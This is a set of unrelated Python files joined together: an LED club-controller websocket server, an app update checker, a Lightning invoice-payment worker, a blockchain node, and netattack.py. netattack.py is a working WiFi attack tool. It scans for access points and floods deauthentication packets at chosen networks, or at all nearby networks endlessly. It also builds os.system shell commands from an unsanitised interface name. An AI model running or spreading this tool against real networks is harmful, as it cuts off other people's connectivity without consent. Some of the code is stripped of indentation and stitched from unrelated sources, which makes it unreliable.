from club_controller.clients.client_udp_listener import ClientUDPListener
from club_controller.clients.led_strip_mode_id import LedStripModeId
from club_controller.misc.config_manager import config_manager
from club_controller.protocol.message_ids import WebsocketActionId
class WebsocketServer:
def __init__(self, client_handler : ClientUDPListener):
self.client_handler = client_handler
self.websocket_clients = set()
self.message_queue = queue.Queue()
self.is_running = False
def message_queue_worker(self):
# TODO USE MESSAGE QUEUE AND combine messages to only send every x ms
while self.is_running:
item = self.message_queue.get()
print(f'Working on {item}')
print(f'Finished {item}')
self.message_queue.task_done()
async def on_message_received(self, websocket, message):
if __debug__ and app_config.PRINT_WEBSOCKET_STREAM_MESSAGES:
print("Received websocket message: " + str(message))
data = json.loads(message)
try:
message_id = WebsocketActionId(data["action"])
except ValueError:
if __debug__:
print("WebsocketActionId does not exist on the server: ", data["action"])
return
if message_id == WebsocketActionId.CLIENT_LIST_REQUEST:
await websocket.send(self.get_client_list_message())
elif message_id == WebsocketActionId.CLIENT_VALUE_UPDATED:
# TODO only send updated data
if __debug__:
print("Received update from client: ", data)
self.client_handler.update_client(data["data"]["client"])
await self.send_to_all(self.get_client_list_message())
elif message_id == WebsocketActionId.ALL_LED_STRIPS_UPDATED:
self.client_handler.update_all_led_strips(data["data"])
await self.send_to_all(self.get_client_list_message())
elif message_id == WebsocketActionId.UI_CONFIG_REQUEST:
await websocket.send(self.get_ui_config_message())
elif message_id == WebsocketActionId.UI_CONFIG_UPDATED:
config_manager.ui_config_manager.update(data["data"])
await self.send_to_all(self.get_ui_config_message())
elif message_id == WebsocketActionId.NEC_COMMAND:
nec_led_strip_client = self.client_handler.get_client_by_value("uid", data["data"]["client"]["uid"])
nec_led_strip_client.send_nec_command(data["data"]["command"])
elif message_id == WebsocketActionId.MAIN_UI_COMPONENT_UPDATED:
uid = data["data"]["uid"]
ui_config = config_manager.get_ui_config()
if ui_config.get("main_ui_components") is None:
ui_config["main_ui_components"] = []
ui_component = None
for ui_c in ui_config["main_ui_components"]:
if ui_c["uid"] == uid:
ui_component = ui_c
if ui_component == None:
ui_component = {"uid": uid, "show_in_main_ui": data["data"]["show_in_main_ui"]}
ui_config["main_ui_components"].append(ui_component)
else:
ui_component["show_in_main_ui"] = data["data"]["show_in_main_ui"]
await self.send_to_all(self.get_ui_config_message())
elif message_id == WebsocketActionId.SAVE_AS_LED_STRIP_PRESET:
preset_client = self.client_handler.get_client_by_value("uid", data["data"]["client_uid"])
ui_config = config_manager.get_ui_config()
if ui_config.get("led_strip_presets") is None:
ui_config["led_strip_presets"] = []
max_uid = -1
for preset in ui_config["led_strip_presets"]:
if preset["uid"] >= max_uid:
max_uid = preset["uid"]
preset = {"uid": max_uid + 1, "title": data["data"]["title"], "filter": preset_client.filter, "frequency": preset_client.frequency}
ui_config["led_strip_presets"].append(preset)
await self.send_to_all(self.get_ui_config_message())
elif message_id == WebsocketActionId.APPLY_PRESET:
client_uid = data["data"]["uid"]
preset_uid = data["data"]["preset_uid"]
if client_uid == None:
print("APPLY_PRESET: client_uid == None")
return
if preset_uid == None:
print("APPLY_PRESET: preset_uid == None")
return
ui_config = self.get_ui_config()
if ui_config.get("led_strip_presets") is None:
ui_config["led_strip_presets"] = []
preset = ui_config["led_strip_presets"][preset_uid]
if preset == None:
print("APPLY_PRESET: prese == None")
return
client = self.client_handler.get_client_by_value("uid", client_uid)
if client == None:
print("APPLY_PRESET: client == None")
return
client.update_from_json(preset)
await self.send_to_all(self.get_client_list_message())
elif message_id == WebsocketActionId.ALL_LED_STRIP_MODES_UPDATED:
self.client_handler.update_all_led_strips({"mode" : data["data"]["mode"]})
await self.send_to_all(self.get_client_list_message())
elif message_id == WebsocketActionId.MAIN_UI_PARAMETERS_UPDATED:
ui_config = config_manager.get_ui_config()
if ui_config["main_ui_parameters"] is None:
print("WebsocketActionId.MAIN_UI_PARAMETERS_UPDATED: ui_config[main_ui_parameters] is None")
return
config_manager.ui_config_manager.update(data["data"])
await self.send_to_all(self.get_ui_config_message())
elif message_id == WebsocketActionId.CONFIGS_META_REQUEST:
message = self.get_configs_meta_message()
await websocket.send(message)
elif message_id == WebsocketActionId.CONFIG_LOAD:
new_active_id = data["data"]["config_id"]
config_manager.update_active_config(new_active_id=new_active_id)
await self.send_to_all(self.get_configs_meta_message())
await self.send_to_all(self.get_client_list_message())
elif message_id == WebsocketActionId.CONFIG_SAVE:
new_config_name = data["data"]["config_name"]
print("new_config_name: " + str(new_config_name))
config_manager.save_current_config(new_config_name)
await self.send_to_all(self.get_configs_meta_message())
elif message_id == WebsocketActionId.STROBE_DELAY_UPDATED:
ui_config = config_manager.get_ui_config()
if ui_config["main_ui_parameters"] is None:
print("WebsocketActionId.STROBE_DELAY_UPDATED: ui_config[main_ui_parameters] is None")
return
if ui_config["main_ui_parameters"]["strobe"] is None:
print("WebsocketActionId.STROBE_DELAY_UPDATED: ui_config[main_ui_parameters][strobe] is None")
return
strobe = ui_config["main_ui_parameters"]["strobe"]
strobe["delay_ms"] = data["data"]["new_delay"]
config_manager.ui_config_manager.update({"strobe": strobe})
self.client_handler.update_all_led_strips({"strobe": strobe})
await self.send_to_all(self.get_ui_config_message())
elif message_id == WebsocketActionId.SENSOR_UPDATE:
intensity = data["data"]["intensity"]
print("intensity: " + str(intensity))
ui_config = config_manager.get_ui_config()
if ui_config["main_ui_parameters"] is None:
print("WebsocketActionId.STROBE_DELAY_UPDATED: ui_config[main_ui_parameters] is None")
return
if ui_config["main_ui_parameters"]["strobe"] is None:
print("WebsocketActionId.STROBE_DELAY_UPDATED: ui_config[main_ui_parameters][strobe] is None")
return
strobe = ui_config["main_ui_parameters"]["strobe"]
# map sensor intensity to strobe frequency
sensitivity_threshold = 3.0
delay_multiplier = 1500
if intensity <= sensitivity_threshold:
# turn off strobe
self.client_handler.update_all_led_strips({"mode" : LedStripModeId.AUDIO_CLIENT.name})
else:
delay = 1.0/(intensity) * delay_multiplier
print("delay: " + str(delay))
strobe["delay_ms"] = delay
self.client_handler.update_all_led_strips({"strobe": strobe, "mode": LedStripModeId.STROBE.name})
else:
if __debug__:
print("WebsocketActionId is not implemented on server: ", data["action"])
def get_configs_meta_message(self):
return json.dumps({"action": int(WebsocketActionId.CONFIGS_META), "configs_meta": config_manager.get_configs_meta()})
def get_client_list_message(self):
return json.dumps({"action": int(WebsocketActionId.CLIENT_LIST), "clients": list(map(lambda c: c.toJson(), self.client_handler.get_clients()))})
def get_ui_config_message(self):
return json.dumps({"action": int(WebsocketActionId.UI_CONFIG), "ui": config_manager.get_ui_config()})
async def send_to_all_but_this(self, websocket, message):
other_ws = list(filter(lambda ws: ws != websocket, self.websocket_clients))
if other_ws: # asyncio.wait doesn't accept an empty list
await asyncio.wait([ws.send(message) for ws in other_ws])
async def send_to_all(self, message):
if self.websocket_clients: # asyncio.wait doesn't accept an empty list
await asyncio.wait([ws.send(message) for ws in self.websocket_clients])
async def register(self, websocket):
self.websocket_clients.add(websocket)
async def unregister(self, websocket):
self.websocket_clients.remove(websocket)
async def handler(self, websocket, path):
await self.register(websocket)
if __debug__:
print("websocket connected on path: " + str(path))
print("All connected websockets: " + str(self.websocket_clients))
await websocket.send(json.dumps({"action": int(WebsocketActionId.HELLO)}))
await websocket.send(self.get_client_list_message())
try:
async for message in websocket:
await self.on_message_received(websocket, message)
except:
print("Websocket error")
finally:
await self.unregister(websocket)
if __debug__:
print("websocket disconnected on path: " + str(path))
print("All connected websockets: " + str(self.websocket_clients))
def start_server_async(self):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
start_server = websockets.serve(self.handler, "0.0.0.0", app_config.WEB_SOCKET_PORT)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
def on_client_connected(self, client):
message = json.dumps({"action": int(WebsocketActionId.CLIENT_CONNECTED), "client": client.toJson()})
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(self.send_to_all(message))
def on_client_disonnected(self, client):
message = json.dumps({"action": int(WebsocketActionId.CLIENT_DISCONNECTED), "client": client.toJson()})
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(self.send_to_all(message))
def on_ui_config_changed(self, data):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(self.update_ui_config_on_uis())
def on_client_configs_changed(self, data):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(self.update_client_configs_on_uis())
async def update_ui_config_on_uis(self):
message = self.get_ui_config_message()
await self.send_to_all(message)
async def update_client_configs_on_uis(self):
message = self.get_client_list_message()
await self.send_to_all(message)
def run(self):
self.client_handler.subscribe_on_client_connected(self.on_client_connected)
self.client_handler.subscribe_on_client_disconnected(self.on_client_disonnected)
config_manager.subscribe_on_ui_config_changed(self.on_ui_config_changed)
config_manager.subscribe_on_client_configs_changed(self.on_client_configs_changed)
#self.message_queue_thread = threading.Thread(target=self.message_queue_worker, daemon=True, name="Websocket-Message-Queue-Thread")
#self.message_queue_thread.start()
self.server_thread = threading.Thread(target=self.start_server_async, name="Websocket-Server-Thread")
self.server_thread.start()
def stop(self):
    """Signal shutdown and wait for the worker threads to finish.

    message_queue_thread is only created when the (currently commented-out)
    queue worker in run() is enabled, so joining it unconditionally raised
    AttributeError; guard with getattr instead.
    """
    self.is_running = False
    mq_thread = getattr(self, 'message_queue_thread', None)
    if mq_thread is not None:
        mq_thread.join()
    self.server_thread.join()
|
update.py | import os
from os.path import dirname, join
import sys
from time import time
import threading
# ensure registry is set up on Windows before we start
from config import appname, appversion, update_feed, update_interval, config
if not getattr(sys, 'frozen', False):
# quick and dirty version comparison assuming "strict" numeric only version numbers
def versioncmp(versionstring):
    """Return a comparable tuple of ints for a dotted numeric version string.

    A realized tuple (rather than a lazy map) compares element-wise on both
    Python 2 and 3, so e.g. '1.10.0' correctly sorts after '1.9.0'.
    """
    return tuple(map(int, versionstring.split('.')))
class Updater():
    """Fallback updater used when not running a frozen build: polls the
    Sparkle appcast feed over HTTP and shows the newest version in the
    app's status widget (no actual self-update is performed)."""

    def __init__(self, master):
        self.root = master  # Tk root; used to locate the status widget

    def checkForUpdates(self):
        # Poll in a background daemon thread so the UI stays responsive.
        thread = threading.Thread(target = self.worker, name = 'update worker')
        thread.daemon = True
        thread.start()

    def worker(self):
        import requests
        from xml.etree import ElementTree
        # Pythons < 2.7.9 can't validate modern TLS certs; skip verification there.
        r = requests.get(update_feed, timeout = 20, verify = (sys.version_info >= (2,7,9)))
        feed = ElementTree.fromstring(r.text)
        # Sparkle version attribute -> human-readable title, per feed item.
        items = dict([(item.find('enclosure').attrib.get('{http://www.andymatuschak.org/xml-namespaces/sparkle}version'),
                       item.find('title').text) for item in feed.findall('channel/item')])
        lastversion = sorted(items, key=versioncmp)[-1]
        if versioncmp(lastversion) > versioncmp(appversion):
            # Announce the newer version in the status widget of the main window.
            self.root.nametowidget('.%s.%s' % (appname.lower(), 'status'))['text'] = items[lastversion] + ' is available'
            self.root.update_idletasks()

    def close(self):
        # Nothing to release in this variant.
        pass
elif sys.platform=='darwin':
import objc
class Updater():
    """macOS updater backed by the Sparkle framework.

    http://sparkle-project.org/documentation/customization/
    """

    def __init__(self, master):
        try:
            # Load Sparkle.framework from the app bundle next to the executable.
            objc.loadBundle('Sparkle', globals(), join(dirname(sys.executable.decode(sys.getfilesystemencoding())), os.pardir, 'Frameworks', 'Sparkle.framework'))
            self.updater = SUUpdater.sharedUpdater()
        except Exception:
            # Can't load framework - not frozen or not included in app bundle?
            # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
            # are no longer swallowed; the best-effort fallback is unchanged.
            self.updater = None

    def checkForUpdates(self):
        # No-op when the framework failed to load.
        if self.updater:
            self.updater.checkForUpdates_(None)

    def close(self):
        # Drop the framework reference.
        self.updater = None
elif sys.platform=='win32':
import ctypes
# https://github.com/vslavik/winsparkle/blob/master/include/winsparkle.h#L272
root = None
def shutdown_request():
    # WinSparkle shutdown callback: ask the Tk mainloop (running on another
    # thread) to quit by posting a <<Quit>> virtual event at the queue tail.
    root.event_generate('<<Quit>>', when="tail")
class Updater():
    """Windows updater backed by the WinSparkle DLL.

    https://github.com/vslavik/winsparkle/wiki/Basic-Setup
    """

    def __init__(self, master):
        try:
            sys.frozen # don't want to try updating python.exe
            self.updater = ctypes.cdll.WinSparkle
            self.updater.win_sparkle_set_appcast_url(update_feed) # py2exe won't let us embed this in resources
            # set up shutdown callback
            global root
            root = master
            self.callback_t = ctypes.CFUNCTYPE(None) # keep reference
            self.callback_fn = self.callback_t(shutdown_request)
            self.updater.win_sparkle_set_shutdown_request_callback(self.callback_fn)
            self.updater.win_sparkle_init()
        except:
            # NOTE(review): bare except is deliberate best-effort here (the
            # AttributeError on sys.frozen is the expected "not frozen" path),
            # but it also swallows SystemExit/KeyboardInterrupt.
            from traceback import print_exc
            print_exc()
            self.updater = None

    def checkForUpdates(self):
        if self.updater:
            self.updater.win_sparkle_check_update_with_ui()

    def close(self):
        # Release WinSparkle resources before dropping the handle.
        if self.updater:
            self.updater.win_sparkle_cleanup()
        self.updater = None
|
PayInvoiceThread.py | import boto3
from CommonThread import CommonThread
import json
from botocore.client import Config
from lnd import Client
from threading import Thread
class PayInvoiceThread(CommonThread):
    """Worker that polls an AWS Step Functions activity for invoice-payment
    tasks and pays each invoice through the local lnd node."""

    def __init__(self, lnddatadir):
        super().__init__('PIThread', 'PayInvoiceThread')
        # get_activity_task long-polls (up to ~60s); keep the botocore read
        # timeout above that so polling doesn't raise spuriously.
        config = Config(
            read_timeout = 65,
            retries = dict(
                max_attempts = 10
            )
        )
        self.sfn = boto3.client('stepfunctions', config = config, region_name = 'us-west-2')
        self.lnd = Client(lnddatadir)

    def handleTaskError(self, token, errorMessage):
        # Report the task as failed back to Step Functions.
        self.sfn.send_task_failure(
            taskToken = token,
            error = "Failed",
            cause = str(errorMessage)
        )

    def handleTask(self, token, data):
        """Attempt the payment once; report success or failure to Step Functions.

        Runs on its own thread (see tryRun). The for/else construct gives a
        single attempt: `break` on success skips the else; any failure path
        falls through to handleTaskError.
        """
        self.logger.info('Thread started for payment: {}'.format(data))
        paymentResponse = None
        # range(1) == exactly one attempt; bump the range to enable retries.
        for x in range(1):
            try:
                # NOTE(review): amount/1000000 suggests data['amount'] is in
                # millionths of a satoshi unit — confirm against the producer.
                paymentResponse = self.lnd.sendPayment(data['invoice'], int(data['amount'] / 1000000))
                self.logger.info('paymentResponse: {}'.format(paymentResponse))
            except Exception as e:
                error = e
            else:
                if paymentResponse.payment_error:
                    error = paymentResponse.payment_error
                else:
                    # Success: attach proof-of-payment and complete the task.
                    data['paymentResponse'] = {
                        'payment_preimage': paymentResponse.payment_preimage.hex(),
                        'payment_route': str(paymentResponse.payment_route),
                    }
                    self.logger.info('Payment succeeded with {}'.format(paymentResponse.payment_preimage.hex()))
                    self.sfn.send_task_success(
                        taskToken = token,
                        output = json.dumps(data),
                    )
                    break
            # Only reached on a failed attempt (exception or payment_error).
            self.logger.error('Payment failed with {} {}'.format(type(error), error))
        else:
            # Loop exhausted without a successful break: fail the task.
            self.handleTaskError(token, error)

    def tryRun(self):
        # Make sure lnd is active before getting a task
        self.lnd.getInfo()
        # NOTE(review): activity ARN is hard-coded to one deployment.
        response = self.sfn.get_activity_task(
            activityArn = 'arn:aws:states:us-west-2:434623153115:activity:CdkStackpayInvoiceActivityB30C5FBC',
            workerName = 'LNTipServer'
        )
        if 'taskToken' in response and 'input' in response:
            token = response['taskToken']
            data = json.loads(response['input'])
            # TODO: join all threads before exiting this one
            Thread(target = self.handleTask, args = (token, data)).start()
        # Pace the polling loop; presumably self.cond comes from CommonThread.
        with self.cond:
            self.cond.wait(10)
|
netattack.py | #!/usr/bin/env python
import sys
import os
import time
import argparse
from threading import Thread
import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0
# ANSI terminal colour codes used throughout the output helpers.
W = '\033[0m'  # white (normal)
R = '\033[31m'  # red
G = '\033[32m'  # green
O = '\033[33m'  # orange
P = '\033[35m'  # purple
BOLD = '\033[1m'  # bold
# Fixed: THIN was defined as '\033[1m' (bold), so the usage text never
# returned to normal weight after a heading; it is meant to reset to normal.
THIN = '\033[0m'  # normal
# creating arguments
def argument_parser():
    """Build and return the CLI argument parser.

    The usage string documents the three main modes (-scan, -deauth,
    -deauthall) with their supporting options; colour codes come from the
    module-level ANSI constants.
    """
    parser = argparse.ArgumentParser(usage='''
'''+BOLD+'''SCAN NETWORKS:'''+THIN+O+'''
-scan (Main command)'''+W+'''
-i or -mon (Interfaces)
-cf (More detailed output format)
-t (Set channel switch delay)
-nr (Don't do a rescan)
'''+BOLD+'''DEAUTH CERTAIN NETWORKS:'''+THIN+O+'''
-deauth (Main command)'''+W+'''
-b (Add a BSSID)
-u (Add a client)
-i or -mon (Interfaces)
-p (Change Packetburst)
-t (set time Interval)
'''+BOLD+'''DEAUTH ALL NETWORKS:'''+THIN+O+'''
-deauthall (Main command)'''+W+'''
-i or -mon (Interfaces)
-p (Packetburst)''')
    # Mode/interface flags.
    parser.add_argument('-mon',
                        '--monitor',
                        action='store_true',
                        help='This activates the monitoring mode \
                        and automatically searches for your wlan device.')
    parser.add_argument('-scan',
                        '--scan',
                        action='store_true',
                        help='This is one of the main parameters. \
                        It searches for all available WiFi-Networks. \
                        Other parameters can be added optionally.')
    parser.add_argument('-cf',
                        '--channelformat',
                        action='store_true',
                        help='It activates the channelformat. \
                        It\'s kind of verbose layout of searching. \
                        Espacially useful if searching for 1 network.')
    parser.add_argument('-t',
                        '--timeout',
                        type=float,
                        help='This is setting a delay. \
                        It can be used to add a delay to deauth \
                        or a delay for switching the channel while scanning. \
                        DEFAULT = 0.75')
    parser.add_argument('-nr',
                        '--norescan',
                        action='store_true',
                        help='-nr can only be used with -scan. \
                        This deactivates multiple scans \
                        and stops when channel 14 is reached.')
    parser.add_argument('-deauth',
                        '--deauth',
                        action='store_true',
                        help='This is one of the main parameters. \
                        It deauth-attacks a certain BSSID. \
                        Adding a client is optionally.')
    parser.add_argument('-deauthall',
                        '--deauthall',
                        action='store_true',
                        help='This is one of the main parameters. \
                        It searches all the WiFi Networks near by \
                        and deauth-attacks them.')
    parser.add_argument('-b',
                        '--bssid',
                        nargs='*',
                        help='With this you add a BSSID to a deauth. \
                        It\'s a necessary parameter for -deauth.')
    parser.add_argument('-a',
                        '--amount',
                        default=0,
                        type=int,
                        help='This is the amount of deauth-packages to be send. \
                        It can only be used with -deauth \
                        DEFAULT = infinite')
    parser.add_argument('-u',
                        '--client',
                        default='FF:FF:FF:FF:FF:FF',
                        help='This adds a client to a deauth-attack. \
                        It can only be used with -deauth and is optionally.\
                        DEFAULT = FF:FF:FF:FF:FF:FF (Broadcast)')
    parser.add_argument('-c',
                        '--channel',
                        type=int,
                        help='This adds a channel to a deauth-attack. \
                        It can only be used with -d. \
                        If there is no certain channel the current channel will be used.')
    parser.add_argument('-p',
                        '--packetburst',
                        type=int,
                        default=64,
                        help='This sets the amount of packets in one burst. \
                        It can only be used with -d \
                        DEFAULT = 64')
    parser.add_argument('-i',
                        '--interface',
                        help='This is a necessary parameter. \
                        It calls the monitoring interface. \
                        This parameter needs to be included everywhere.')
    return parser
def throw_error():
    """Validate the parsed CLI arguments (module-global `args`).

    Prints an error and exits on fatal misuse. NOTE(review): a few branches
    print a warning WITHOUT exiting (-p while scanning, -nr while deauthing,
    the -deauthall combination check) — presumably intentional soft
    warnings, but confirm.
    """
    # invalid arguments handling
    if not args.deauth and not args.scan and not args.deauthall and not args.monitor:
        # No mode chosen at all: show usage.
        argument_parser().print_usage()
        sys.exit(0)
    if not args.interface and not args.monitor:
        print('[' +R+ '-' +W+'] No interface selected.')
        sys.exit(0)
    if args.deauth and args.channelformat:
        print('[' +R+ '-' +W+'] Parameter -cf not available when deauthing.')
        sys.exit(0)
    if args.deauth and not args.bssid:
        print('[' +R+ '-' +W+'] Error. No BSSID selected.')
        sys.exit(0)
    if args.scan and args.packetburst != 64:
        # Warning only (no exit).
        print('[' +R+ '-' +W+'] Parameter -p not available when scanning.')
    if args.scan and args.amount:
        print('[' +R+ '-' +W+'] Parameter -a not available when scanning.')
        sys.exit(0)
    if args.scan and args.bssid:
        print('[' +R+ '-' +W+'] Parameter -b not available when scanning.')
        sys.exit(0)
    if args.scan and args.deauth:
        print('[' +R+ '-' +W+'] Scan and Deauth can\'t be executed at the same time.')
        sys.exit(0)
    if args.deauth and args.norescan:
        # Warning only (no exit).
        print('[' +R+ '-' +W+'] Parameter -nr not available when deauthing.')
    if args.deauthall:
        if args.bssid or args.channel or args.amount or args.deauth or args.norescan or args.timeout or args.channelformat or args.scan:
            # Warning only (no exit).
            print('[' +R+ '-' +W+'] (1) -deauthall -i ["iface"] -p ["packets"]| no more parameters. (2) Remove -deauthall')
    if args.bssid and args.client != 'FF:FF:FF:FF:FF:FF':
        if len(args.bssid) > 1:
            # A single client cannot be paired with multiple target APs.
            print('[' +R+ '-' +W+'] Unable to add clients if there are multiple BSSIDs.')
            sys.exit(0)
    if args.interface and args.monitor:
        print('[' +R+ '-' +W+'] You can\'t use -i and -mon. Try only one of them.')
        sys.exit(0)
# # # # # # # # # # # # # # #
# SCAN #
# # # # # # # # # # # # # # #
# handling the packages
def pckt_handler(pckt):
    """Sniff callback: record newly-seen access points from beacon frames."""
    # Only 802.11 frames are of interest.
    if not pckt.haslayer(Dot11):
        return
    # Management frame (type 0), beacon (subtype 8)?
    if pckt.type != 0 or pckt.subtype != 8:
        return
    if pckt.addr2 not in APs:
        # Remember the channel we were listening on and report the AP.
        APs[pckt.addr2] = on_channel
        output_aps(pckt.addr2, pckt.info, on_channel)
# printing found ap
def output_aps(bssid, essid, channel):
    """Print one discovered access point, optionally in verbose -cf layout."""
    # Single-digit channels get one extra padding space to keep columns aligned.
    pad = 3 if len(str(channel)) == 1 else 2
    mac = str(bssid).upper()
    if args.channelformat:
        print('[' +G+ '+' +W+ '] [' +P+ 'BSSID' +W+ '] '+mac+' '*2+'|'+' '*2+'[' +P+ 'CH' +W+ '] '+str(channel)+' '*pad+'|'+' '*2+'[' +P+ 'ESSID' +W+ '] '+essid+'')
    else:
        print(mac + ' | ' + str(channel) + ' '*pad + '| ' + str(essid))
# hopping between wifi channels
def channel_hop():
    """Cycle the interface through WiFi channels 1-14 while sniff() runs.

    Runs on a daemon thread. Advances the module-global `on_channel` (read
    by pckt_handler) and restarts at 1 unless -nr was given or the
    module-global `rescan` is False (deauthall mode).
    """
    global on_channel
    timeout = 0.75  # default dwell time per channel, seconds
    if args.timeout:
        timeout = args.timeout
    if not args.channelformat:
        # Compact table header (the -cf layout prints per-channel banners instead).
        print('\n[' +O+ '*' +W+ '] Searching for WiFi Networks...\n')
        print(O+ 'MAC' + ' '*19 + 'CH' + ' '*5 + 'ESSID' +W)
    while True:
        if on_channel > 14:
            if args.norescan:
                print('\nPress CTRL-C to quit...')
                # NOTE(review): sys.exit in this daemon thread ends only the
                # thread; the main sniff() keeps running until CTRL-C.
                sys.exit(0)
            elif not rescan:
                # deauthall mode: one pass over the channels, then stop hopping.
                break
            else:
                on_channel = 1
                if args.channelformat:
                    print('\n--------------- RESCAN ---------------\n')
                continue
        if args.channelformat:
            print('[CHANNEL] ' + str(on_channel) + '/14')
        os.system('iwconfig ' + iface + ' channel ' + str(on_channel))
        time.sleep(timeout)
        on_channel += 1
# # # # # # # # # # # # # # #
# DEAUTH #
# # # # # # # # # # # # # # #
def set_channel():
    """Tune the interface to the -c channel, or channel 4 by default."""
    # NOTE(review): iface is user-supplied and interpolated into a shell
    # command; args.channel is safe (argparse type=int).
    channel = args.channel if args.channel else 4
    os.system('iwconfig ' + iface + ' channel ' + str(channel))
# creating and managing packets
def deauth(args):
    """Deauth-attack the APs in args.bssid, endlessly (amount == 0) or for
    a fixed number of bursts per AP.

    The previous version duplicated the whole burst body between the
    endless and the counted loop; it is factored into one helper now,
    with identical packets, prints, and sleep behaviour.
    """
    bssid = args.bssid
    client = args.client
    amount = args.amount
    sleep = args.timeout if args.timeout else 0
    endless = amount == 0
    broadcast = client == 'FF:FF:FF:FF:FF:FF'

    def _burst(ap):
        # One burst of args.packetburst deauth frames AP->client, plus the
        # reverse direction when a specific client was targeted.
        ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
        if not broadcast:
            c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth()
        try:
            for _ in range(args.packetburst):
                send(ap_c_pckt)
                if not broadcast:
                    send(c_ap_pckt)
            print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap)
            time.sleep(sleep)
        except KeyboardInterrupt:
            print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
            sys.exit(0)

    while endless:
        for ap in bssid:
            _burst(ap)
    while amount > 0:
        for ap in bssid:
            _burst(ap)
            amount -= 1
    print('[' +R+ '!' +W+ '] Finished successfully.')
print('[' +R+ '!' +W+ '] Finished successfully.')
def deauth_all():
    """Endlessly broadcast deauth frames to every AP collected in the
    module-global APs dict, retuning to each AP's recorded channel first.

    Runs until the process is interrupted.
    """
    print('\n[' +O+ '*' +W+ '] Starting deauth...\n')
    while True:
        for ap in APs:
            for x in range(args.packetburst):
                try:
                    # Broadcast deauth (all clients of this AP).
                    ap_c_pckt = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth()
                    # NOTE(review): hops channel once per packet — likely
                    # intended once per AP; confirm before changing.
                    os.system('iwconfig ' + iface + ' channel ' + str(APs[ap]))
                    send(ap_c_pckt)
                except (KeyboardInterrupt):
                    print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
                    sys.exit(0)
            print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + str(ap).upper())
# # # # # # # # # # # # # # #
# MONITOR #
# # # # # # # # # # # # # # #
def monitor_on():
    """Find the first wlan* interface, switch it to monitor mode, return it.

    Exits the script if no wireless interface is present.
    """
    for iface in os.listdir('/sys/class/net/'):
        if 'wlan' not in iface:
            continue
        print('\n[' +G+ '+' +W+ '] Interface found!\nTurning on monitoring mode...')
        # Interface must be down while switching modes.
        os.system('ifconfig ' + iface + ' down')
        os.system('iwconfig ' + iface + ' mode monitor')
        os.system('ifconfig ' + iface + ' up')
        print('[' +G+ '+' +W+ '] Turned on monitoring mode on: ' + iface)
        return iface
    # Fell through the loop: no wlan* interface was found.
    print('[' +R+ '-' +W+'] No interface found. Try it manually.')
    sys.exit(0)
# # # # # # # # # # # # # # #
# MAIN #
# # # # # # # # # # # # # # #
if __name__ == '__main__':
    print(P+'* * * * * * * * * * * * * * * * * *')
    print('* N E T A T T A C K by chrizator *')
    print('* * * * * * * * * * * * * * * * * *'+W)
    args = argument_parser().parse_args()
    APs = {}  # BSSID -> channel, filled by pckt_handler during sniffing
    on_channel = 1  # current scan channel, advanced by channel_hop
    rescan = True  # keep cycling channels past 14 (disabled for -deauthall)
    throw_error()
    iface = None
    if args.interface:
        iface = args.interface
    if args.monitor:
        # -mon: auto-detect a wlan* interface and enable monitor mode.
        iface = monitor_on()
    conf.iface = iface #-> set scapy's interface
    ## SCAN ##
    if args.scan:
        # channel hopping thread
        hop_t = Thread(target=channel_hop, args=[])
        hop_t.daemon = True
        hop_t.start()
        # Blocks here printing APs until interrupted.
        sniff(iface=iface, prn=pckt_handler, store=0)
    ## DEAUTH ##
    if args.deauth:
        set_channel()
        deauth(args)
    ## DEAUTHALL#
    if args.deauthall:
        rescan = False
        hop_t = Thread(target=channel_hop, args=[])
        hop_t.daemon = True
        hop_t.start()
        # Scan for ~13s (roughly one pass over 14 channels), then attack
        # everything that was collected in APs.
        sniff(iface=iface, prn=pckt_handler, store=0, timeout=13)
        deauth_all()
|
node.py | import block
import wallet
import constants
import blockchain
import requests
import transaction
from Crypto.Hash import SHA
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
import binascii
import json
import threading
from time import sleep
class node:
    """One participant in the NBC blockchain network.

    The bootstrap node (imeBootstrap=True, id 0) creates the genesis block
    and registers the other N-1 nodes; everyone else registers with the
    bootstrap over HTTP. `ring` maps node-id -> {ip, port, address, utxos}.

    Fix in this revision: validate_transaction used to return True for a
    sender with insufficient balance (despite printing "not enough NBC's"),
    so overspending transactions were accepted into blocks; it now rejects
    them. dummy() also honours its `amount` parameter instead of a
    hard-coded 100 (its only caller passes 100, so behaviour is unchanged).
    """
    def __init__(self, myIp, myPort, imeBootstrap, ipBootstrap, portBootstrap, N):
        # initializing the values. If the node is the bootstrap node he initzalizes the ring and th chain as well
        self.otherNodeMined = threading.Event();  # set when a peer's block wins the race
        self.otherNodeMined.clear();
        self.mining = False;
        self.allow = threading.Event();  # gates registrations while a block is mined
        self.allow.set();
        self.ip = myIp;
        self.port = myPort;
        self.ipBootstrap = ipBootstrap;
        self.portBootstrap = portBootstrap;
        self.number = N;
        self.myWallet = self.create_wallet()
        self.current_id_count = 1;
        if imeBootstrap:
            self.id = 0;
            self.chain = blockchain.blockchain();
            self.ring = dict();
            genesis = block.Block(1, -1, self.id);
            # Genesis transaction grants N*100 NBC to the bootstrap wallet.
            genesisTransaction = transaction.Transaction('0', '0', self.myWallet.address, N * 100, receiverID = '0', genesis = True);
            genesis.add_transaction(genesisTransaction);
            genesisUTXO = genesisTransaction.transaction_outputs[0]
            self.myWallet.transactions.append(genesisUTXO)
            tempDict = dict();
            tempDict['ip'] = self.ip;
            tempDict['port'] = self.port;
            tempDict['address'] = self.myWallet.address;
            tempDict['utxos'] = [genesisUTXO];
            self.ring['0'] = tempDict;
